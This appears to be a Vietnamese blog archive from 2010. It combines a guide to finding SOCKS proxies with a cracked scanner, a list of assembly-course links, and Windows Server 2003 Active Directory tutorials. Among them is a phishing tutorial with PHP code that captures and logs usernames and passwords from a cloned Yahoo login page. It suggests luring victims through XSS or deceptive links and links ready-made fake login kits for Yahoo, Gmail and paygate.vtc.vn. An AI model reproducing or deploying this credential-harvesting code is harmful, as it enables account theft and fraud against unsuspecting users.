2 cái ô 1 và 2 thì đó là nơi bạn diền IP của sock hoặc Proxxy và cả Port của Sock và proxxy nhé! bạn có gì điền đó, proxy hay sock? điền 1 thứ thôi, có gì điền đó nhưng phải là con còn sống!

Xong rồi thì cứ OK => OK

Giờ bắt đầu test xem bạn đã thành công hay chưa nha! test bằng trang anh Ngoaingutinhoc.net đưa cũng được mà trang dưới này cũng được
Chạy http://rrdb.org ==>


Tìm sock good : Socks Proxy Search v2.0 full và check sock full info

Làm theo hình vẽ nha:

Đầu tiên down Socks Proxy Search v2.0 full về, cài đặt và crack bằng cách cho file serial.key vào trong thư mục cài ra (ổ C). Giao diện như hình:
Bước 1: Click "Fnd" để scan sock, scan xong rùi thì save lại theo port.














Cuối cùng thì vào Proxyfirewall để lấy những sock live. Hết.


Code:
http://www.mediafire.com/file/ddoeg1ejwyy/SocksProxySearchv2.0_wWw.SoftProVn.Net.rar

Proxyfirewall

Code:
http://www.mediafire.com/file/imodmwlkzmj/Proxyfirewall_wWw.SoftProVn.Net.rar
:pw:
Code:
wWw.SoftProVn.Net

6/22/10

[MASM] Masm tuts cơ bản

http://cdbt.edu.vn/Resources/Item/92/Noi%20dung%20Assembly%20v%209-05.doc

http://www.ictu.edu.vn/LinkClick.aspx?fileticket=U7Wbbvyifjk%3D&tabid=209&mid=1139

http://saimete.edu.vn/saimete/index.php?option=com_docman&task=doc_download&gid=32&Itemid=222

http://ccd.hua.edu.vn/ncthang/download/VXL/Chuong03.pdf

http://tailieu.vn/xem-tai-lieu/su-dung-masm-de-xay-dung-chuong-trinh.116495.html

6/13/10

[Hacking] Hướng dẫn làm trang yahoo giả mạo lừa lấy mật khẩu

- Hôm vừa rồi có ghé thăm web trường thấy có bị dính bug XSS nhìu wa' ... thức khuya coi trận tứ kết Cúp C1 2010 MU-Bayer ko bi'k làm chi rãnh mu'c cái bug XSS fa' chơi (mai mang con lap về mình sẽ làm cái video cho các bạn xem nhé, giờ máy PC nặng quá chạy k nổi)

- Nhân tiện đây mình cũng xin hướng dẫn các bạn cách làm trang đăng nhập yahoo,gmail... giả mạo để lừa lấy mật khẩu ...

- Còn làm sao để người ta đăng nhập bằng trang yahoo mạo đó thì do bạn: lợi dụng bug xss, hay gởi link đến nạn nhân dụ dỗ, hay email ... tùy ứng của bạn

- Yêu cầu của mình là khi bạn đọc hướng dẫn bạn làm theo và bạn phải hiểu vấn đề vì sao phải làm thế này thế kia :)

- Cái này thì cũ ri'c từ thời Hùng Vương đến giờ rùi, nhưng đôi lúc vẫn cần va't ra sử dụng đó ... Đồ cũ mà lại hiếm và hay nhìu người ko để ý.

1/ Đầu tiên mở notepad gõ vào nội dung sau:
$now = date("H:i:s Y-m-d");
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<><>
<>location.href="http://mail.yahoo.com"< / script >
< /body>< / html>


Lưu lại với tên yahoo.php

2/ Tạo thêm 1 file y.txt với nội dung trống rỗng nữa
3/ Vào trang mail.yahoo.com save as toàn bộ trang web lại
- Mở file htm lên bằng wordpad hoặc bằng trình soạn thảo nào đó như Notepad, Notepad++,EditPlus...
Tìm dòng:
< method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">

Và thay thế vào đó
< form name="login_form" action="y.php" method="post">


4/ Bây giờ bạn chỉ cần up lên host (host hỗ trợ php). Và CHMOD file y.txt là 777
5/ Xong...

+++ Ngoài ra các bạn có thể giả mạo form đăng nhập bất kì site nào bằng cách tương tự như trên

- Code làm sẵn fake đăng nhập yahoo:
http://www.mediafire.com/?mm2wtzicikq

- Code làm sẵn fake đăng nhập gmail:
http://www.mediafire.com/?wtz1umiiyyk

- Code làm sẵn fake đăng nhập paygate.vtc.vn:
http://www.mediafire.com/?nwwegjzqzjh

reflink: http://vn.360plus.yahoo.com/romeo_nhonguoi_2012/article?mid=61

6/12/10

[Net] Giáo trình Quản trị mạng Windows Server 2003 Chương 2 – Thiết lập 2 Domain Controller chạy song song

Giáo trình Quản trị mạng Windows Server 2003 Chương 2 – Thiết lập 2 Domain Controller chạy song song

Chương - 2

THIẾT LẬP 2 DOMAIN CONTROLLER CHẠY SONG SONG

Trong chương này sẽ bao gồm 2 phần:

Phần 1 – Thiết lập 2 Domain Controller chạy song song.

Phần 2 – Distribut File System (DFS).


http://www.docstoc.com/docs/12372009/Chuong-2---Thiet-lap-nhieu-Server-chay-song-song-va-DFS

[Net] Thiết lập server chạy song song – Phần I, III

- Bước 1 : Dựng Domain Controller cho Server1
- Bước 2 : Dùng Server2 join Domain vào Server1 và dựng Domain Controller cho máy Server2
- Bước 3 : Đồng bộ 2 server, bật Gobal Catalog
- Bước 4 : Join domain cho máy client
- Bước 5 : Tắt chế độ cache logon và test thử bằng cách tắt 1 trong 2 Domain Controller.

Máy Server 1: Nâng cấp lên domain controller

Đặt IP tĩnh cho DC theo các tham số sau:
IP: 192.168.1.10
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10
(Dạo này do mạng chậm và truy cập vào 4rum rất khó khăn, nên bước này không post hình với lại bước này cũng dễ và là rất cơ bản, chắc bạn nào cũng biết.)
• Vào Start -> Run -> Chạy chương trình DCPROMO để nâng cấp lên lên Domain Controller
• Cửa sổ “Active Directory Installation Wizard” , nhấn Next
• Domain Controller Type, chọn Domain controller for a new domain và click next
• Ở khung Ceate New Domain, chọn Domain in a new forest
• Khung New Domain Name, điền vào domains của bạn (vd: abc.com, tencongty.com.vn…)
• NetBIOS Domain Name, để nguyên giá trị mặc định
• Chọn giá trị mặc định cho các thư mục chứa cấu hình hệ thống
• DNS Registration Diagnostics, chọn Install and configure the DNS server on this computer, and set this computer to use this DNS server as its preferrend DNS server
• Permissions, chọn Permissions compatible only with Windows 2000 or Windows Server 2003 operating systems ….
• Dicrectory Services Restore Mode Administrator Password, điền password nếu bạn cần.
• Chọn Finish để kết thúc quá trình cài đặt và reboot lại.
Sau khi reboot lại thì tạo user tên “u1” , password: 123 (???)

2/ Máy Server 2: Join vào domain và nâng cấp lên domain controller.

A/ Join domain :

Đặt IP tĩnh cho server2 theo các tham số sau:
IP: 192.168.1.20
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10

Click nút phải chuột trên My Computer / Properties / Computer Name / Change
Điền tên domain “anthaifood.com” vào ô domain (tên miền mình làm thí nghiệm là anthaifood.com)

Sau khi OK, sẽ hiện lên 1 của sổ ta điền user để join domains, bạn điền user: administrator (user của máy server1)

OK, reboot lại máy server 2

B/ Dựng Domain Controller

Sau khi rebot lại máy Server2, vào Start -> Run -> Chạy chương trình DCPROMO để nâng cấp lên lên Domain Controller. (???)

Cửa sổ “Active Directory Installation Wizard” , nhấn Next
Tại cửa sổ “Domain Controller Type” chọn dòng Additional domain controller for an existing domain.

Network Credentials: Nhập username & password administrator của máy server1

Để mặc định tại các cửa sổ này

Dicrectory Services Restore Mode Administrator Password, điền password nếu cần (là password cần khi chúng ta restore hệ thống Domain Controller)

Đến cửa sổ này thì đợi một tí.

Đến đây thì đã thành công, chọn Finish để kết thúc quá trình cài đặt và reboot lại.

C/ Dựng DNS :

Đặt lại IP cho server2 theo các tham số sau:
IP: 192.168.1.20
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.20

Vào Control Panel -> Windows Components, chọn Details
Ở phần Networking Services chọn Domain Name System (DNS) và nhấn OK, nhấn tiếp Next để cài đặt.

3/ Đồng bộ 2 server và join domains cho client

A/ Server1:

Start -> Program File -> Administrator Tool -> Active Directory Site and Services

Trong cữa sổ Active Directory Site and Services chọn Sites -> Defaut-Fist-Site-Name -> Servers thì sẽ thấy 2 server, vào properties từng NTDS Settings của mỗi server và check vào Gobal Catalog.

Trỏ Alternate DNS Server1 về Server2 (192.168.1.20)

B/ Server 2:
Trỏ Alternate DNS Server2 về Server1 (192.168.1.10)

Reboot Server1 & Server2

4/ Máy Client:

Đặt IP tĩnh cho máy Client theo các tham số sau:
IP: 192.168.1.2
NetMask: 255.255.255.0
Preferred DNS Server: 192.168.1.10
Alternate DNS Server : 192.168.1.20

Click nút phải chuột trên My Computer / Properties / Computer Name / Change
Điền tên domain “anthaifood.com” vào ô domain, khi hỏi username và password thì điền vào tài khoản quản trị của Domain Controller (DC)
Reboot lại Client

Sau khi reboot lại đăng nhập bằng tài khoản sau: user: u1 / password : 123

5/ thử nghiệm:

Tắt đi 1 trong 2 server mà máy client vẫn login vào được DC, tạo thêm u2,u3 … để thử nghiệm.
Ghi chú: tắt chế độ cache logon trong local plicy (interactive logon) test mới chính xác (???)


reflink: http://roseandgun.wordpress.com/2008/04/09/thi%E1%BA%BFt-l%E1%BA%ADp-server-ch%E1%BA%A1y-song-song-ph%E1%BA%A7n-i/


PHẦN III: Operation Master

Giới thiệu: Mặc dù W2k/W2k3 hỗ trợ Multi Master (các DC hoạt động song song nhau, không phân biệt chính/phụ ). Tuy nhiên vẫn còn một số chức năng hoạt động ở chế độ Single Master, cụ thể là:
1. Schema Master: Quản lý schema, mỗi forest có 1 cái
2. Domain Naming: Quản lý danh sách các domain, mỗi forest có 1 cái
3. PDC: Giả lập server NT để chứng thực cho các WS đồi cũ (win9x), mỗi domain có 1 cái
4. RID: cấp số ID cho user, mỗi domain có 1 cái
5. Infrastructer: Quản lý danh sách user ở domain khác tham dự vào các nhóm của domain hiện tại., mỗi domain có 1 cái

Mặc định các chức năng do DC1 nắm giữ. Khi DC1 chết thì những thao tác liên quan đến 5 chức năng này sẽ không thực hiện được.

Khi DC1 “chết bất đắc kỳ tử”, ta cần “cưỡng chế” DC2 giữ 5 chức năng này. Bài viết sẽ hướng dẫn chi tiết các bước thực hiện việc “cưỡng chế”

Bài viết này gồm 3 bước:
1. Giả sử master DC bị chết (DC1 bị “die” bất đắc)
2. Từ Addition DC (DC2) ra CMD gõ các lệnh để cưỡng chế 5 chức năng single master của DC1 sang DC2
3. Sau khi thành công, DC2 tạo user và client join domain bằng user mới tạo thành công.

Thực hiện
1./ giả sử DC1 bị die (shutdown DC1)
2./ từ DC2, vào cmd gõ các lệnh để cưỡng chế 5 chức năng single master của DC1 sang DC2
Trình tự các lệnh như sau: (Copy từ màn hình DOS ra)
——————————————————–
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\>ntdsutil ‘Lệnh đầu tiên trong wá trình Operation Master
ntdsutil: ?
‘Các lệnh trong ‘ntdsutil’
? – Show this help information
Authoritative restore – Authoritatively restore the DIT database
Configurable Settings – Manage configurable settings
Domain management – Prepare for new domain creation
Files – Manage NTDS database files
Group Membership Evaluation – Evaluate SIDs in token for a given user or group
Help – Show this help information
LDAP policies – Manage LDAP protocol policies
Metadata cleanup – Clean up objects of decommissioned servers
Popups %s – (en/dis)able popups with “on” or “off”
Quit – Quit the utility
Roles – Manage NTDS role owner tokens
Security account management – Manage Security Account Database – Duplicate SID Cleanup
Semantic database analysis – Semantic Checker
Set DSRM Password – Reset directory service restore mode administrator account password

ntdsutil: Roles ‘Lệnh thứ 2 trong wá trình Operation Master
fsmo maintenance: ?
‘Các lệnhh trong ‘Roles’
? – Show this help information
Connections – Connect to a specific domain controller
Help – Show this help information
Quit – Return to the prior menu
Seize domain naming master – Overwrite domain role on connected server
Seize infrastructure master – Overwrite infrastructure role on connected server
Seize PDC – Overwrite PDC role on connected server
Seize RID master – Overwrite RID role on connected server
Seize schema master – Overwrite schema role on connected server
Select operation target – Select sites, servers, domains, roles and naming contexts
Transfer domain naming master – Make connected server the domain naming master
Transfer infrastructure master – Make connected server the infrastructure master
Transfer PDC – Make connected server the PDC
Transfer RID master – Make connected server the RID master
Transfer schema master – Make connected server the schema master

fsmo maintenance: connections ‘Lệnh thứ 3 trong quá trình Operation Master
server connections: ?
‘Các lệnh trong ‘connections’
? – Show this help information
Clear creds – Clear prior connection credentials
Connect to domain %s – Connect to DNS domain name
Connect to server %s – Connect to server, DNS name or IP address
Help – Show this help information
Info – Show connection information
Quit – Return to the prior menu
Set creds %s %s %s – Set connection creds as domain, user, pwd.
Use “NULL” for null password,
* to enter password from the console.

server connections: connect to server ser.anthaifood.com ‘Lệnh thứ 4 trong wá trình Operation Master
Binding to ser.anthaifood.com …
Connected to ser.anthaifood.com using credentials of locally logged on user.
server connections: quit ‘Lệnh thứ 5 trong wá trình Operation Master

fsmo maintenance: seize schema master ‘Lệnh thứ 6 trong wá trình Operation Master
Attempting safe transfer of schema FSMO before seizure.
ldap_modify_sW error 0×34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(Xuất hiện thông báo, chọn “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of schema FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Domain – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
RID – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m

fsmo maintenance: seize domain naming master ‘Lệnh thứ 7 trong wá trình Operation Master
Attempting safe transfer of domain naming FSMO before seizure.
ldap_modify_sW error 0×34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(Xuất hiện thông báo, chọn “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,ldap, or role transfer error.
Transfer of domain naming FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
RID – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m

fsmo maintenance: seize RID master ‘Lệnh thứ 8 trong wá trình Operation Master (chữ RID viết hoa)
Attempting safe transfer of RID FSMO before seizure.
ldap_modify_sW error 0×34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-03210922, problem 5002 (UNAVAILABLE), data 1722
(Xuất hiện thông báo, chọn “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The currentFSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,ldap, or role transfer error.
Transfer of RID FSMO failed, proceeding with seizure …
Searching for highest rid pool in domain
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
PDC – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m

fsmo maintenance: seize PDC ‘Lệnh thứ 9 trong wá trình Operation Master (chữ PDC viết hoa)
Attempting safe transfer of PDC FSMO before seizure.
ldap_modify_sW error 0×34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-03210511, problem 5002 (UNAVAILABLE), data 1722
(Xuất hiện thông báo, chọn “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of PDC FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
PDC – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Infrastructure – CN=NTDS Settings,CN=SERVER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m

fsmo maintenance: seize infrastructure master ‘Lệnh thứ 10 trong wá trình Operation Master
Attempting safe transfer of infrastructure FSMO before seizure.
ldap_modify_sW error 0×34(52 (Unavailable).
Ldap extended error message is 000020AF: SvcErr: DSID-0321032A, problem 5002 (UNAVAILABLE), data 1722
(Xuất hiện thông báo, chọn “YES”)

Win32 error returned is 0x20af(The requested FSMO operation failed. The current FSMO holder could not be contacted.))
Depending on the error code this may indicate a connection,
ldap, or role transfer error.
Transfer of infrastructure FSMO failed, proceeding with seizure …
Server “ser.anthaifood.com” knows about 5 roles
Schema – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Domain – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
PDC – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
RID – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
Infrastructure – CN=NTDS Settings,CN=SER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=anthaifood,DC=co m
fsmo maintenance: quit ‘Lệnh thứ 11 trong wá trình Operation Master
ntdsutil: quit ‘Lệnh thứ 12 trong wá trình Operation Master
Disconnecting from ser.anthaifood.com…

C:\>
——————————————————–

3./ Bây giờ ta thử bằng cách từ máy DC 2 (vừa được lên master) ta tạo user và từ máy client có thể join vào domain bằng user mới được tạo.


reflink: http://roseandgun.wordpress.com/2008/04/09/thi%E1%BA%BFt-l%E1%BA%ADp-hai-server-ch%E1%BA%A1y-song-song-ph%E1%BA%A7n-iii-master-operation/

[Net] Thiết lập nhiều server chạy song song - Phần 4: Remove Server đã chết

PHẦN 4: Remove Server Đã Chết

GIới thiệu:
Để ta có thể làm bài lab này mình xin giới thiệu sơ lược về các phần trước để cho các bạn có thể hiểu rõ hơn.
Giả sử ta có 1 domain gồm 2 DC,1 là master DC và 1 addition DC (xem lại phần 2). Sau khi master DC (server 1) bị chết và ta đã biến addition DC (server 2) thành Master để thay thế master DC đã chết (xem lại phần 3). Tuy nhiên vấn đề vẫn còn để cho chúng ta giải quyết, chính là xác của server 1 ( đã chết) vẫn còn nằm trong hệ thống domain chúng ta, làm cho hệ thống chúng ta sẽ bị chậm đi. Do vậy yêu cầu mới lại được đặt ra ,làm sao ta có thể xóa xạch các vết tích về server đã chết để ta có thể tối ưu được tốc độ hệ thống. Do đó ta phải đi dọn xác nó

Yêu cầu: đã làm các bước ờ phần 1 và phần 3


-------------------------------------------------------------------------------
Bài lab này gồm các bước:

bước 1: Giả sử server 1 chết hẳn
bước 2: từ server 2 thực hiện theo phần 3. sau đó ra CMD ta đánh tiếp các lệnh để gở bỏ xác domain đã chết.


-------------------------------------------------------------------------------
khi thực hiện bài lab này mình làm trên các máy 1,2 của trường nên các máy có kí hiệu như sau:

- domain: nhatnghe.com
- pc1: server 1
- pc2: server 2


-----------------------------------------------------------------------------------
Thực hiện

1\ shut down pc1 (server 1) ,sau đó thực hiện seizing 5 chức năng master cho server 2 như phần 3
2\ Từ server 2 ----> ra CMD

Đánh ---ntdsutil---



Tiếp theo đánh ---metadata cleanup---



Sau đó đánh ---connections---



Tại dòng nhắc server connections đánh lệnh ---connect to server Pc02.nhatnghe.com--- (tên đầy đủ của server 2)



Tiếp theo ta đánh lệnh ---quit---



Đánh tiếp lệnh ---select operation target---



Đánh lệnh ---list domain---



Các bạn để ý dòng found 1 domain(s) chỉ có 1 domain nhatnghe thôi, nên ở đây ta sẽ chọn số 0, tương ứng với domain ta có là nhatnghe (trường hợp nếu bạn có nhiều domain thì cũng sẽ được liệt kê ở đây)

Do đó ta đánh tiếp lệnh ---select domain 0---



Ta đánh tiếp lệnh ---list sites---



Các bạn nhìn tại dòng found 1 site(s). Mặc định ta có 1 site tương ứng với số 0.

Nên ta đánh tiếp ---select site 0---



Tiếp theo ta sử dụng lệnh ---list server in site---



Bạn nhìn tại dòng found 2 server(S) gồm có pc1 (server 1 đã chết,tương ứng với số 0)pc 2 (server 2 còn sống,tương ứng với số 1).

Do ta muốn remove server 1 đã chết nên ta sẽ đánh tiếp lệnh ---select server 0---



Tiếp theo ta đánh lệnh ---quit---



Tại đây ta đánh lệnh ---remove selected server--- (xóa gở bò server 1 mà ta đã chọn ở dòng trên). Nó sẽ xuất hiện lên 1 bảng thông báo hỏi mình có remove không ... ta chọn YES và đợi khoảng 30 giây để nó remove server 1



Sau đó ta đánh các lệnh quit ----> quit----> exit để thoát khỏi CMD





Tiếp theo bạn bỏ dĩa cài win2k3 vào cài thêm bộ support tool



- Sau khi cài xong bộ support tool, ta vào start ---> run ---> mmc .
- vào menu file ----> add remove snap in
---> chọn công cụ có tên là ADSI edit ---> mở ADSI edit chuột phải chọn dòng connect to....




Tại dòng select a well known naming context: ta chọn domain

Sau đó ta connect thêm 1 lần nữa .... Nhưng kỳ này ta chọn Configuration.




Sau đó tại màn hình ADSI edit ta vào theo hướng dẫn trong hình : Domain [pc02.nhatnghe.com] --->DC=nhatnghe,DC=com ----> OU=domain controler . Nhìn sang bên tay phải nếu bạn còn thấy vết tích gì của server 1 (CN=Pc01..) thì xóa nó đi , như ở đây nó đã được xóa rồi




Tiếp theo ta xuống configuration [PC02.nhatnghe.com] ----> CN=configuration,DC=nhatnghe,DC=com ----> CN=sites ---> CN= default-first-site-name ----> CN=server . Nhìn sang bên tay phải nếu còn vết tích của server 1 (CN=Pc01 ...) thì ta xóa nó đi.







Đến đây coi như bạn đã hoàn thành remove server 1 đã chết




Còn tiếp phần 5

reflink: http://www.nhatnghe.com/forum/showthread.php?1268-Thi%E1%BA%BFt-l%E1%BA%ADp-nhi%E1%BB_u-server-ch%E1%BA%A1y-song-song-Ph%E1%BA%A7n-4-Remove-Server-%C4%91%C3%A3-ch%E1%BA%BFt